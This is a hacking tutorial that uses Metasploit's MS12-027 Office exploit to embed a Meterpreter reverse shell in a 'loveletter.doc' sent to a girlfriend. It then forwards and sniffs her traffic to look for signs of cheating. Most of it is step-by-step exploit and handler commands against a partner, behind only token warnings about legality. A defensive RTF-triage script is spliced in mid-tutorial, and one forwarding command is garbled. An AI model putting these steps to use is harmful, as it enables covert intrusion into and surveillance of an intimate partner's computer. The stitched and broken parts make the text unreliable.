Welcome back, my hacker apprentices!
Several of you have written asking me how you can check on whether your boyfriend, girlfriend, or spouse is cheating on you, so I dedicate this tutorial to all of you with doubts about the fidelity of your spouse, girlfriend, or boyfriend.
A Fair Warning
Before I start, I want to point out that hacking into somebody's computer is illegal in most countries. What might be the consequences for hacking into a friend's or spouse's computer? Kelly Terry, one of our Null Byte community members, has firsthand experience with her husband, who's now paying a heavy price. She recounts her experience on her blog.
I'm not a relationship counselor or anything of that sort, but if you're worried that your partner is cheating on you, there are only two possibilities. First, they are NOT cheating on you and your paranoia is destructive to the relationship. Second, they ARE cheating on you and you should get out of the relationship.
My point here is that if you're obsessed with jealousy in your relationship, you should either remove that feeling or leave the relationship. Hacking their machine to find evidence is only likely to make the situation worse because you could...
- End up in prison like Kelly Terry's husband,
- Find nothing, but that won't relieve the anxiety and jealousy, or
- Find something, and you knew all along that the relationship was bad for you.
None of these outcomes are good!
Just a warning.
The instructions below are merely for learning purposes.
Step 1: Compromise Her System
Let's fire up BackTrack and Metasploit and figure out a way to compromise her system.
A couple of years back (April 2012), an exploit was found in the wild that triggers a buffer overflow (I'll be doing a tutorial to explain buffer overflows soon) on Windows 7 systems with Office 2007 or Office 2010. Since I know my girlfriend has Windows 7 and Office 2007 on her computer, this just might be the perfect exploit to use on her.
In addition, I often send her little love letters as attachments, so she will not suspect anything if I send another. This time, though, I will embed the Meterpreter so that I can "own" her system and check up on her.
Of course, I think it goes without saying (maybe not?) that this exploit will work with anyone that trusts you enough to open your Word document. Similar tactics are used by spammers and scammers all the time.
When this vulnerability was found in the wild, Microsoft designated it MS12-027. Metasploit developers then wrote an exploit for Metasploit that does exactly the same thing and named it ms12_027_mscomctl_bof. If we want to use it to exploit our girlfriend's computer, we can find it by typing at the msfconsole:
- msf > search ms12_027
This should retrieve just one exploit as above. To avoid typographical errors, simply copy and paste it into the next line like I have done above.
Step 2: Let's Get Some Background Info
If I'm new to an exploit, I like to learn a little about what it does before I start. Let's type:
- msf > info
Notice that this exploit has two potential targets, Microsoft Office 2007 (target 0) and Microsoft Office 2010 (target 1). In addition, in the description it states:
"This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed a specially crafted..."
Notice that it also states "The DEP/ASLR bypass on Office 2010...". For those of you who are unfamiliar, DEP is Data Execution Prevention and ASLR is Address Space Layout Randomization. Both are implemented on most operating systems to prevent exactly what we are doing here.
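Seen from the receiving side, the module description gives a mail gateway or analyst something concrete to look for: RTF content, whatever the file extension says, that embeds an OLE/ActiveX object from MSCOMCTL.OCX. The static check below is an added example, not code from this tutorial or from Metasploit; the function names, finding labels and both sample byte strings are constructed for illustration, and the `MSComctlLib` ProgID match is a heuristic.

```python
import re

RTF_MAGIC = b"{\\rt"   # loose match on the start of the "{\rtf1" header
OBJ_WORDS = (b"\\objocx", b"\\objemb", b"\\objdata")   # RTF embedded-object control words
# ProgID prefix used by the controls shipped in MSCOMCTL.OCX (heuristic marker),
# checked as ASCII and as UTF-16LE because OLE streams store names both ways.
MSCOMCTL_MARKERS = (b"MSComctlLib", "MSComctlLib".encode("utf-16-le"))


def decode_objdata(raw: bytes) -> bytes:
    """Hex-decode every \\objdata payload, ignoring whitespace between digits.

    Limitation: obfuscated documents may interleave other control words with
    the hex digits; this decoder stops at the first non-hex character.
    """
    out = bytearray()
    for m in re.finditer(rb"\\objdata\s*([0-9a-fA-F\s]+)", raw):
        digits = re.sub(rb"\s+", b"", m.group(1))
        out += bytes.fromhex(digits[: len(digits) & ~1].decode("ascii"))
    return bytes(out)


def triage(name: str, raw: bytes) -> dict:
    """Return static findings for one attachment (file name plus raw bytes)."""
    is_rtf = raw.lstrip().startswith(RTF_MAGIC)
    findings = []
    if is_rtf:
        if not name.lower().endswith(".rtf"):
            findings.append("rtf-content-with-non-rtf-extension")
        if any(word in raw for word in OBJ_WORDS):
            findings.append("embedded-ole-object")
        blob = decode_objdata(raw)
        if any(marker in blob for marker in MSCOMCTL_MARKERS):
            findings.append("mscomctl-activex-control")
    return {"is_rtf": is_rtf, "findings": findings}


# Constructed, harmless samples: the "object" is only a class-name string.
CONSTRUCTED_PAYLOAD = b"\x01\x05\x00\x00MSComctlLib.ListViewCtrl.2\x00"
SAMPLE_SUSPECT = (b"{\\rtf1{\\object\\objocx{\\*\\objdata "
                  + CONSTRUCTED_PAYLOAD.hex().encode("ascii") + b"}}}")
SAMPLE_BENIGN = b"{\\rtf1\\ansi Hello}"

if __name__ == "__main__":
    print(triage("loveletter.doc", SAMPLE_SUSPECT))
    print(triage("note.rtf", SAMPLE_BENIGN))
```

Any finding is a reason to quarantine the attachment and confirm that the MS12-027 update is installed on the recipient's machine before the file is opened in Word.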
Step 3: Show Targets & Create Doc
Since we're pretty certain she uses Office 2007 and not Office 2010, let's set our target for 2007.
- set target 0
Now, rather than use the generic msf.doc that comes with this exploit, let's give it a name that will entice her to open it. Let's call it loveletter.doc.
- set FILENAME loveletter.doc
We next have to give it a payload and tell it what system it needs to connect back to (LHOST) when she opens it.
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.1.111
With all the options set, we type exploit and Metasploit creates our malicious document and places it in the /root/.msf/local directory with a name we gave it, loveletter.doc.
Step 4: Multi Handler
Now that we have the malicious Word file created called loveletter.doc, we next need to open a multi-handler on our Metasploit system to receive the connection when she opens the file.
- use exploit/multi/handler
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.1.111
- exploit
Now, as you can see, Metasploit has a listener waiting for a connection from the girlfriend's computer. Let's email her that loveletter.doc and when she opens that file, it will create a Meterpreter session on our computer and we will own her system!
As you can see, she opened the file and a Meterpreter session opened on our computer. We own her system!
Step 5: Verify It's the Right Computer
Just to make certain we're on the right computer, let's get the sysinfo:
- meterpreter > sysinfo
As you can see, it tells us that the system we have compromised is a Windows 7 64-bit computer. That's her machine!
Step 6: Forward Her Internet Traffic Back Through Us
Now that we have control of her system, you can forward all her Internet traffic through your computer. In this way, you can sniff her traffic and search for telltale signs of cheating, such as keywords. You might even set up an intrusion detection system on her traffic looking for keywords that will alert you.
First, forward her traffic to you by typing at the Meterpreter prompt:
- meterpreter> portfwd add -L 192.168.1.100 -l 80 -r 192.168.1.111 -p 80
Next, we need to forward all traffic from her through our computer out to the Internet. We can do that by turning on IP forwarding on our system. We do that by typing:
- bt > echo 1 /proc/sys/net/ipv4/ipforward
Step 7: Search for Keywords
Now that all her traffic is going through your system, you can view her traffic through Wireshark to see what sites she is visiting and even better, set up Snort to look for keywords in her TCP stream going through our computer.
So now, my hacker apprentices, we have several different ways to hack Windows 7 systems, but we still have more, so keep coming back.